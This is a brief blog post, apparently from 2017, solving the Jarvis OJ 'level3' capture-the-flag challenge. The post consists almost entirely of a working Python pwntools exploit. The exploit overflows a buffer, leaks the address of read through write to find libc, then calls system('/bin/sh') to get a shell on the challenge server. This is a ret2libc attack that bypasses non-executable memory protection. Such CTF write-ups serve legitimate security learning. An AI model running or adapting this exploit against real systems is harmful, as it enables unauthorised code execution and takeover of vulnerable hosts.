Jarvis OJ-level3

使用ret2libc攻击方法绕过数据执行保护

from pwn import*
conn = remote("pwn2.jarvisoj.com",9879)

elf = ELF('level3')
libc = ELF('libc-2.19.so')

plt_write = elf.symbols['write']  #0804834
print 'plt_write = ' + hex(plt_write)
got_read = elf.got['read']  #0804A00C
print 'got_read = ' + hex(got_read)

payload = 0x8C * 'a' 
payload += p32(plt_write)
payload += p32(0x0804844B)
payload += p32(1)
payload += p32(got_read)
payload += p32(4)

conn.recvuntil("Input:\n")
conn.send(payload)
temp = conn.recv(4)
read_addr = u32(temp[0:4])
print 'read_addr = ' + hex(read_addr)

libc_read_addr = 0x000daf60             #readelf -a ./libc-2.19.so | grep "read@"
offset = read_addr - libc_read_addr
libc_system_addr = 0x00040310           #readelf -a ./libc-2.19.so | grep "system@"
system_addr = offset + libc_system_addr
libc_binsh_addr = 0x16084c              #strings -a -t x .//libc-2.19.so' | grep "/bin/sh"
binsh_addr = offset + libc_binsh_addr

ret = 0x08048480

payload = 0x8C * 'a' + p32(system_addr) + p32(ret) + p32(binsh_addr)
conn.send(payload)
conn.interactive()

  

posted @ 2017-05-15 19:58  五千年木  阅读(378)  评论(0编辑  收藏  举报